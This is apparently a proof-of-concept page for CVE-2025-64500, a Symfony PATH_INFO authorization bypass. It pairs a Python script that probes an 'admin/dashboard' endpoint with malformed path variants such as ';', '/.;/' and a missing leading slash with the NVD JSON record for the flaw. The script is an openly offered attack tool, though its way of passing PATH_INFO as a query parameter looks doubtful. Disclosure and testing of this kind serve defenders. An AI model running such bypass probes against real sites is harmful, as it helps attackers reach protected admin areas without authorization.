CVE-2025-64500

# CVE-2025-64500 PoC - Symfony PATH_INFO Authorization Bypass # This PoC demonstrates how a malformed PATH_INFO can bypass access controls # that assume URL paths start with '/' import requests import urllib.parse TARGET_URL = "http://target-site.com/" VULNERABLE_ENDPOINT = "admin/dashboard" def test_path_info_bypass(): """ Test if the target is vulnerable to PATH_INFO based authorization bypass. Some access control rules assume URL paths start with '/' """ headers = { "User-Agent": "Mozilla/5.0 (CVE-2025-64500 PoC)", "X-Original-URI": f"/{VULNERABLE_ENDPOINT}" } # Normal request - should be blocked by access control normal_request = requests.get( TARGET_URL + VULNERABLE_ENDPOINT, headers=headers, allow_redirects=False ) print(f"Normal request status: {normal_request.status_code}") # Bypass attempt using PATH_INFO without leading '/' # This may bypass access controls that incorrectly validate paths bypass_paths = [ VULNERABLE_ENDPOINT, # Missing leading slash ";" + VULNERABLE_ENDPOINT, "/.;/" + VULNERABLE_ENDPOINT, "/" + VULNERABLE_ENDPOINT + "/." ] for bypass_path in bypass_paths: try: response = requests.get( TARGET_URL, headers=headers, params={"PATH_INFO": bypass_path}, allow_redirects=False ) print(f"Bypass path '{bypass_path}': {response.status_code}") if response.status_code == 200: print(f"[+] Potential bypass detected with path: {bypass_path}") return True except Exception as e: print(f"Error testing {bypass_path}: {e}") return False if __name__ == "__main__": print("CVE-2025-64500 Symfony PATH_INFO Bypass Test") print("=" * 50) test_path_info_bypass()

{"cve": {"id": "CVE-2025-64500", "sourceIdentifier": "[email protected]", "published": "2025-11-12T22:15:50.127", "lastModified": "2026-01-12T17:49:20.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Symfony is a PHP framework for web and console applications and a set of reusable PHP components. Symfony's HttpFoundation component defines an object-oriented layer for the HTTP specification. Starting in version 2.0.0 and prior to version 5.4.50, 6.4.29, and 7.3.7, the `Request` class improperly interprets some `PATH_INFO` in a way that leads to representing some URLs with a path that doesn't start with a `/`. This can allow bypassing some access control rules that are built with this `/`-prefix assumption. Starting in versions 5.4.50, 6.4.29, and 7.3.7, the `Request` class now ensures that URL paths always start with a `/`."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-647"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sensiolabs:httpfoundation:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "5.4.50", "matchCriteriaId": "5D588185-C231-41DD-AE26-9EF1B0455E74"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sensiolabs:httpfoundation:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.4.29", "matchCriteriaId": "BB2A74C0-A989-4BAB-BDB3-0A65864B562A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sensiolabs:httpfoundation:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.3.7", "matchCriteriaId": "3F169B04-38C4-4825-A5A2-F010F1BC3D82"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "5.4.50", "matchCriteriaId": "6E3ADEC4-C8AE-415E-969F-5B4D1C1C701C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.4.29", "matchCriteriaId": "6E769614-2F0D-4DD4-871D-8AE245F3EC9C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.3.7", "matchCriteriaId": "6AFA7FF2-0E23-4EC8-923E-3A4A69C75B13"}]}]}], "references": [{"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2025-64500.yaml", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2025-64500.yaml", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/symfony/symfony/commit/9962b91b12bb791322fa73836b350836b6db7cac", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/symfony/symfony/security/advisories/GHSA-3rg7-wf37-54rm", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://symfony.com/blog/cve-2025-64500-incorrect-parsing-of-path-info-can-lead-to-limited-authorization-bypass", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}